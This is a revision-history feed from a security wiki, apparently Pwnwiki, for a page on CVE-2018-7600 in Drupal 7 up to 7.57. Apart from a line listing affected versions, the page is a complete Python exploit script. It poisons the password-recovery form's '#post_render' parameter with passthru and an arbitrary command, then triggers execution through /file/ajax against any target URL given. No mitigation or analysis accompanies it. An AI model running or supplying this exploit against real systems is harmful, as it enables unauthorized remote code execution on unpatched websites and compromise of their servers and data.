https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2018-7600 Drupal遠程代碼執行漏洞 - Revision history
2026-04-14T14:42:59Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2741&oldid=prev
Pwnwiki: Created page with "==影響版本== DRUPAL 7 <= 7.57 ==EXP== <pre> #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = argparse.Ar..."
2021-05-08T09:01:05Z
<p>Created page with "==影響版本== DRUPAL 7 <= 7.57 ==EXP== <pre> #!/usr/bin/env python3 import requests import argparse from bs4 import BeautifulSoup def get_args(): parser = argparse.Ar..."</p>
<p><b>New page</b></p><div>==影響版本==<br />
DRUPAL 7 <= 7.57<br />
<br />
<br />
==EXP==<br />
<pre><br />
#!/usr/bin/env python3<br />
<br />
import requests<br />
import argparse<br />
from bs4 import BeautifulSoup<br />
<br />
def get_args():<br />
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",<br />
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),<br />
epilog= '''<br />
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57<br />
by poisoning the recover password form (user/password) and triggering it with<br />
the upload file via ajax (/file/ajax).<br />
''')<br />
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")<br />
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")<br />
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")<br />
parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")<br />
args = parser.parse_args()<br />
return args<br />
<br />
def pwn_target(target, function, command, proxy):<br />
requests.packages.urllib3.disable_warnings()<br />
proxies = {'http': proxy, 'https': proxy}<br />
print('[*] Poisoning a form and including it in cache.')<br />
get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}<br />
post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}<br />
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)<br />
soup = BeautifulSoup(r.text, "html.parser")<br />
try:<br />
form = soup.find('form', {'id': 'user-pass'})<br />
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')<br />
if form_build_id:<br />
print('[*] Poisoned form ID: ' + form_build_id)<br />
print('[*] Triggering exploit to execute: ' + command)<br />
get_params = {'q':'file/ajax/name/#value/' + form_build_id}<br />
post_params = {'form_build_id':form_build_id}<br />
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)<br />
parsed_result = r.text.split('[{"command":"settings"')[0]<br />
print(parsed_result)<br />
except:<br />
print("ERROR: Something went wrong.")<br />
raise<br />
<br />
def main():<br />
print ()<br />
print ('=============================================================================')<br />
print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')<br />
print ('| by pimps |')<br />
print ('=============================================================================\n')<br />
<br />
args = get_args() # get the cl args<br />
pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())<br />
<br />
<br />
if __name__ == '__main__':<br />
main()<br />
</pre></div>
Pwnwiki